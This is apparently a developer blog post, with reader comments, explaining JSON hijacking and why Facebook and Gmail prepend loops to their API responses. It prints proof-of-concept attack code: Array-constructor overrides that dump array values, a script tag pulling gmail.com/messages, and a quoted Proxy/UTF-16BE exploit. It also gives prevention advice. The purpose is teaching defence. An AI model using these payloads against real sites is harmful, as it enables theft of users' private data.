Antony Garand

Posted on Nov 13, 2018 • Edited on Jul 7, 2020

Why Facebook's api starts with a for loop

#security #javascript

If you ever inspected your requests to big company's API's in the browser, you might have noticed some weird javascript before the JSON itself:

Facebook

Gmail

Why would they waste few bytes to invalidate this JSON?

To protect your data

Without those important bytes, it could be possible for any website to access this data.

This vulnerability is called JSON hijacking, and allows websites to extract the JSON data from those API's.

Origins

In JavaScript 1.5 and earlier versions, it was possible to override Primitive Object's constructor, and have this overwritten version called when using bracket notations.

This means you could do:

function Array(){
    alert('You created an array!');
}
var x = [1,2,3];

And the alert would popup!

Replace the var x with the following script, and the attacker could read your emails!

This works by overwriting the Array constructor before loading an external script.

<script src="https://gmail.com/messages"></script>

Data extraction

Even though you're overriding the constructor, the array is still constructed and you can still access it via this.

Here is a snippet which will alert all of the array data:

function Array() {
  var that = this;
  var index = 0;
  // Populating the array with setters, which dump the value when called
  var valueExtractor = function(value) {
    // Alert the value
    alert(value);
    // Set the next index to use this method as well
    that.__defineSetter__(index.toString(),valueExtractor );
    index++;
  };
  // Set the setter for item 0
  that.__defineSetter__(index.toString(),valueExtractor );
  index++;
}

Upon creating arrays, their values will be alerted!

This was fixed in the ECMAScript 4 proposal, as we now can no longer override the prototype of most primitives, such as Object and Array.

Even though ES4 was never released, this vulnerability was fixed by major browsers soon after its discovery.

You can still have similar behavior in today's javascript, but it is limited to variables you create, or item creations not using the bracket notation.

This would be the adapted version of the previous payload:

// Making an array
const x = [];

// Making the overwritten methods
x.copy = [];
const extractor = (v) => {
    // Keeping the value in a different array
    x.copy.push(v);
    // Setting the extractor for the next value
    const currentIndex = x.copy.length;
    x.__defineSetter__(currentIndex, extractor);
    x.__defineGetter__(currentIndex, ()=>x.copy[currentIndex]);
    // Logging the value
    console.log('Extracted value', v);
};

// Assigning the setter on index 0 
x.__defineSetter__(0, extractor);
x.__defineGetter__(0, ()=>x.copy[0]);


// Using the array as usual

x[0] = 'zero';
x[1] = 'one';

console.log(x[0]);
console.log(x[1]);

And this would be a version using the Array keyword to create your array:

function Array(){
    console.log(arguments);
}

Array("secret","values");

As you can see, the data you added to the array was logged, while the functionality remains the same!

The fix itself was not to block the function Array creation in itself, but to force the bracket notation of item creations to use the native implementation, and not your custom function.

This means we can still create an Array function, but it won't be called with square brackets array creations ([1,2,3]).

It still will be called if we use the x = new Array(1,2,3) or x = Array(1,2,3) notation though, but this doesn't impact JSON hijacking.

Modern variations

Alright, so we know old versions of browsers were vulnerable a while ago.
What does this mean for us today?

Well, with the recent release of EcmaScript 6, new juicy features were added such as Proxies!

Gareth Heyes from Portswigger blogged out out a modern variation of this attack, which still lets us steal data from JSON endpoints!

Using Proxies instead of Accessors lets us steal any variable created, no matter what its name is.
It can behave like an accessor but for any accessed or written property.

Using this and another quirk, it is possible to steal data once again!

UTF-16BE is a multi-byte charset and so two bytes will actually form one character. If for example your script starts with [" this will be treated as the character 0x5b22 not 0x5b 0x22. 0x5b22 happens to be a valid JavaScript variable =). Can you see where this is going?

Using such a script:

<script charset="UTF-16BE" src="external-script-with-array-literal"></script>

With a bit of controlled data from this script, as well as the practical bit-shifting script to make this legible again, we can exfiltrate data once again!

Here is his final edge POC, taken from his blog post:

<!doctype HTML>
<script>
Object.setPrototypeOf(__proto__,new Proxy(__proto__,{
    has:function(target,name){
        alert(name.replace(/./g,function(c){ c=c.charCodeAt(0);return String.fromCharCode(c>>8,c&0xff); }));
    }
}));
</script>
<script charset="UTF-16BE" src="external-script-with-array-literal"></script>
<!-- script contains the following response: ["supersecret","<?php echo chr(0)?>aa"] -->

As I won't explain his method in depth, I strongly suggest you to read his post for more information.

Prevention

Here are the official OWASP recommendations, taken from their AJAX security cheat sheet

Use CSRF Protection
This prevents the exploit by not returning the data if a security header or csrf token is missing.
Always return JSON with an Object on the outside

This last solution is interesting.

In Firefox and IE, this is valid:

x = [{"key":"value"}]
x = {"key":"value"}
[{"key":"value"}]
{key: "value"}

But this isn't:

{"key":"value"}

The reason why it is not valid is that browsers considers the brackets to be the start of a block statement, and not an object creation.
The notation without quotes, {key: "value"}, is considered a label, with the value being a statement.

[See edit: This is wrong] Chrome, unlike the others, considers those cases to be an object creation, and therefore it creates a new object.

Thanks Matt (r0x33d) for the help demystifying this!

Update: Mathias Bynens from the V8 team pointed this out:

But the DevTools implicitly wrap your input code to make this work.

This can be tested by evaluating the code instead of simply running it:

eval('{"x":"y"}');

This throws the same error on all browsers.

Chrome therefore correctly handles this input when in a raw script tag, even though the dev tools console might not have the same behavior.

Conclusion

While those vectors may not be working today, we never know what new bug tomorrow will bring, and therefore we should still do our best to prevent API's from being exploitable.
If we took this StackOverflow answer answer for granted, we would have been vulnerable to the modern variants, and therefore still possibly hacked.

Google and Facebook's answer has been to add invalid javascript or infinite loops before their JSON data, but there are few other alternatives as listed by OWASP.

References:

Haacked.com - JSON Highjacking

Stackoverflow - Why does google prepend [a loop] to their JSON responses

Portswigger - JSON highjacking for the modern web
And the slides of Gareth Heyes

Top comments (39)

Ben Halpern • Nov 13 '18

This is incredibly illuminating. Thank you so much for this Antony!

raphipsp • Nov 14 '18

Replace var x with an html script tag?
But how?

Antony Garand • Nov 14 '18

In your webpage, you would do the following:

<script>
function Array(){
    alert('You created an array!');
}
</script>
<script src="https://gmail.com/messages"></script>

This way you overload the constructor before loading the messages themselves.

raphipsp • Nov 14 '18

Ah ok, I see.
I think the way it is written in the article is confusing. It should instead say "override the Array constructor before loading external scripts"

Antony Garand • Nov 14 '18

Thanks for the feedback, updated the post so it's more clear

raphipsp • Nov 14 '18

Wow you're fast!

Beni Cherniavsky-Paskin • Nov 20 '18

Is this all only to protect people that misuse eval() to parse JSON? JSON.parse() has never been affected by any of this, right?

Hmm, the article gives example of malicious site loading the JSON API directly with a script tag: <script src="https://gmail.com/messages"></script>.
So here's where I'm confused:

Why would a differed site have authentication to get answers from the API using a script tag?
If it works with a script tag and hacks to extract data from evaluating JSON as JS, why won't it work anyway with an AJAX request, parsing the result however you want?

Is this because script tags are historically lax about same-origin policies? I knew evil.example.com can include a script tag for gmail.com, but does that also give such request access to gmail.com cookies?!?

Alex Lohr • Nov 20 '18

a script tag will basically send the same request that would be sent if the URL itself was loaded in the browser - if the browser has cookies saved for the URL, they will be sent and thus authentication cookies can successfully be validated.
because AJAX requests are discarded by the browser unless the correct Cross Origin Resource Sharing (CORS) headers are set on the server, so you won't get the result.

While it is absolutely possible to implement a strict security layer on an API server, this will also increase the CPU/memory/bandwidth requirements. If you have a really big service such as gmail, you'd rather do as much security as possible on the front-end level.

Miff • Nov 13 '18

I'm really wondering how any of these attack techniques would fare against simpler CSRF techniques like double-submitted cookies.

Other stupid ways that seem like they could mitigate this would be to just make all the JSON endpoints require a POST, or to use a different method of encoding data that can't be interpreted as valid Javascript at all (XML?)

Nathan Johnson • Nov 15 '18

Making them all POST wouldn't be semantic (POST means you're changing something on the server). JSON is the standard API data format now, and it's much better than XML in my opinion.

The ultimate way to prevent these attacks is to not allow user submitted input to end up anywhere in output unescaped so attackers' scripts are never able to be injected.

Richard Tallent • Dec 9 '18

No one cares about semantics verbs. Using POST for API endpoints solves an entire class of link-based attacks. We should of course still use CSRF and other mitigations, but the semantic purism argument is a weak one, IMHO.

Guney Ozsan • Nov 23 '18

Not POST but using header authentication an all endpoints can add a layer of security. But this is extra. Nathan's point is well told.

Joshua Arnott • Nov 14 '18 • Edited

I can see how adding an infinite for-loop at the start of the JSON response would prevent it from being executed as JavaScript. How does the original site access the data? Does it need to use a function to discard the first X bytes of every response before loading the JSON? Or is there something I'm missing?

Antony Garand • Nov 14 '18

This is exactly it!

As they load the string version of the JSON, they can remove their JS breaking mechanism before parsing it

Michael Z • Jan 28 '21

While those vectors may not be working today, we never know what new bug tomorrow will bring, and therefore we should still do our best to prevent API's from being exploitable.

Wouldn't CORB prevent JSON hijacking in modern browers? developers.google.com/web/updates/...

Manda Putra • Nov 19 '18

I just follow along your articles with devs tool open haha

Davis • Dec 26 '18

TLDR: use Auth Headers instead of cookies in your API and don't use script tags to call an API?? We shouldnt be looking at the hacks that giants use and instead use actual security improvements. CSP headers!